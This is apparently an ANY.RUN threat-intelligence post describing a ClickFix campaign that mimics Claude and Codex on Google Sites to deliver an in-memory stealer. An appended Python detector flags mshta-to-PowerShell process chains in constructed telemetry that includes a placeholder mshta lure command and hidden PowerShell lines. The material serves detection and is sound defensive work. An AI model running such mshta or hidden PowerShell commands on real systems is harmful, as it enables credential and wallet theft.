Fake Claude & Codex Deliver In-Memory Stealer: ClickFix via Google Sites

We're tracking a #ClickFix campaign that mimics popular AI tools, including Codex and Claude, and abuses trusted Google Sites infrastructure to deliver stealer #malware. With no standalone executable dropped to disk and network activity appearing as legitimate powershell.exe traffic, the attack can significantly reduce visibility during the early stages of compromise.

Victims are directed to trusted sites[.]google[.]com pages and instructed to execute an mshta command. The attack results in in-memory stealer execution, theft of browser, email, and cryptocurrency wallet data, and outbound communication with attacker-controlled C2 infrastructure, while leaving fewer traditional detection opportunities for SOC teams.

Execution chain: Trusted Google Sites lure → User-executed mshta command → Multi-stage PowerShell delivery → Steganographic payload extraction from image → Shellcode deployment → In-memory execution inside powershell.exe → Browser, email & wallet data theft → C2 exfiltration

Using #ANYRUN Sandbox, investigate the full ClickFix execution chain, validate detection coverage, and observe PowerShell staging, steganographic payload delivery, and credential theft activity.
Explore the analysis sessions and collect IOCs:

Codex lure: https://app.any.run/tasks/151cfb30-5ef2-4962-a90e-58a59ecc43da/?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_term=030626&utm_content=linktoservice

Claude lure: https://app.any.run/tasks/698e0bd5-01b6-40fe-814c-5c0885cea645/?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_term=030626&utm_content=linktoservice

Track related ClickFix activity in #ANYRUN TI Lookup, identify additional Codex and Claude lures, and uncover related AI-themed ClickFix activity and infrastructure:

https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_content=030626&utm_term=linktotilookup#%7B%2522query%2522:%2522url:%255C%2522https:/sites.google.com/*/cdx%255C%2522%2520or%2520url:%255C%2522https:/sites.google.com/*/clau%255C%2522%2522,%2522dateRange%2522:7%7D

https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_content=030626&utm_term=linktotilookup#%7B%22query%22:%22ruleName:%5C%22AI-themed%20ClickFix%20phishing%20page%20has%20been%20detected%5C%22%22,%22dateRange%22:14%7D

Equip your SOC with stronger phishing detection and contain incidents faster: https://any.run/enterprise/?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_term=030626&utm_content=linktoenterprise

#cybersecurity #infosec
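Detection logic for the execution chain described above, as an added example that is not part of ANY.RUN's post: it walks a process tree built from Sysmon-style events and flags mshta.exe launched with a remote URL, powershell.exe descended from mshta.exe, and network connections from such a powershell.exe. The event records, pids, file paths, the lure URL path and the 203.0.113.10 / 192.0.2.5 addresses are constructed placeholders, not indicators from the campaign.

```python
import re
from typing import Dict, Iterator, List, Tuple

# Constructed Sysmon-style telemetry (not real data): event 1 = process create,
# event 3 = network connect. The benign admin PowerShell session at the end is
# included to show the parent-chain check does not fire on it.
SAMPLE_EVENTS: List[dict] = [
    {"event": 1, "pid": 2200, "ppid": 1000, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"event": 1, "pid": 4100, "ppid": 2200, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta https://sites.google.com/view/PLACEHOLDER-LURE/page"},
    {"event": 1, "pid": 4200, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -c <constructed stage-1 placeholder>"},
    {"event": 1, "pid": 4300, "ppid": 4200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -c <constructed stage-2 placeholder>"},
    {"event": 3, "pid": 4300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dst": "203.0.113.10", "dport": 443},
    {"event": 1, "pid": 5100, "ppid": 2200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "powershell"},
    {"event": 3, "pid": 5100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dst": "192.0.2.5", "dport": 443},
]

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def build_process_tree(events: List[dict]) -> Dict[int, dict]:
    """Index process-creation events by pid so parents can be looked up."""
    return {e["pid"]: e for e in events if e["event"] == 1}

def ancestors(tree: Dict[int, dict], pid: int) -> Iterator[str]:
    """Yield image basenames of pid and every parent above it (loop-safe)."""
    seen = set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        yield basename(tree[pid]["image"])
        pid = tree[pid]["ppid"]

def detect_clickfix_chain(events: List[dict]) -> List[Tuple[str, int]]:
    """Return (rule, pid) findings for the mshta -> PowerShell -> network pattern."""
    tree = build_process_tree(events)
    findings: List[Tuple[str, int]] = []
    for e in events:
        name = basename(e["image"])
        if e["event"] == 1 and name == "mshta.exe" and re.search(r"https?://", e["cmd"], re.I):
            findings.append(("mshta_remote_url", e["pid"]))          # user pasted an mshta URL command
        if e["event"] == 1 and name == "powershell.exe" and "mshta.exe" in list(ancestors(tree, e["ppid"])):
            findings.append(("powershell_under_mshta", e["pid"]))    # PowerShell staging under mshta
        if e["event"] == 3 and name == "powershell.exe" and "mshta.exe" in list(ancestors(tree, e["pid"])):
            findings.append(("c2_from_powershell_under_mshta", e["pid"]))  # outbound traffic from that chain
    return findings

if __name__ == "__main__":
    for rule, pid in detect_clickfix_chain(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The stand-alone powershell.exe session (pid 5100) talks to the network just like the staged one, which is why the ancestry check, not the process name alone, carries the detection.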